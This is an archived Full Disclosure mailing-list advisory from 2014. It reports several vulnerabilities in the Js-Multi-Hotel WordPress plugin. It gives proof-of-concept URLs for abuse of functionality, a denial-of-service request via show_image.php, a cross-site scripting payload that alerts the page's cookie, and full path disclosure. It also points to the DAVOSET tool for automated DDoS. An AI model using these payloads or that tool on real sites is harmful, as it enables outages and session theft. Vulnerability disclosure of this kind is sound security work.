[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Multiple vulnerabilities in Js-Multi-Hotel for WordPress
From: "MustLive" <mustlive () websecurity ! com ! ua>
Date: 2014-03-31 17:14:30
Message-ID: 06f001cf4d04$f16798a0$9b7a6fd5 () pc
[Download RAW message or body]
Hello list!
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress.
Earlier I wrote about two other vulnerabilities.
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for
WordPress. There are much more vulnerabilities in this plugin (including
dangerous holes), so after two advisories I'll write new advisories.
-------------------------
Affected products:
-------------------------
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
-------------------------
Affected vendors:
-------------------------
Joomlaskin
http://www.joomlaskin.it
-------------------------
Affected products:
-------------------------
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
----------
Details:
----------
Abuse of Functionality (WASC-42):
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1
DoS (WASC-10):
http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1
Besides conducting DoS attack manually, it's also possible to conduct
automated DoS and DDoS attacks with using of DAVOSET
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).
DDoS attacks via other sites execution tool:
http://websecurity.com.ua/davoset/
Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I
Cross-Site Scripting (WASC-08):
http://site/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E
About XSS vulnerability in refreshDate.php in parameter roomid there was
written earlier
(http://packetstormsecurity.com/files/124239/WordPress-Js-Multi-Hotel-2.2.1-Cross-Site-Scripting.html).
Full path disclosure (WASC-13):
http://site/wp-content/plugins/js-multihotel/includes/functions.php
http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php
http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=
http://site/wp-content/plugins/js-multihotel/includes/show_image.php
http://site/wp-content/plugins/js-multihotel/includes/widget.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php
http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php
I wrote about these vulnerabilities at my site
(http://websecurity.com.ua/7087/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic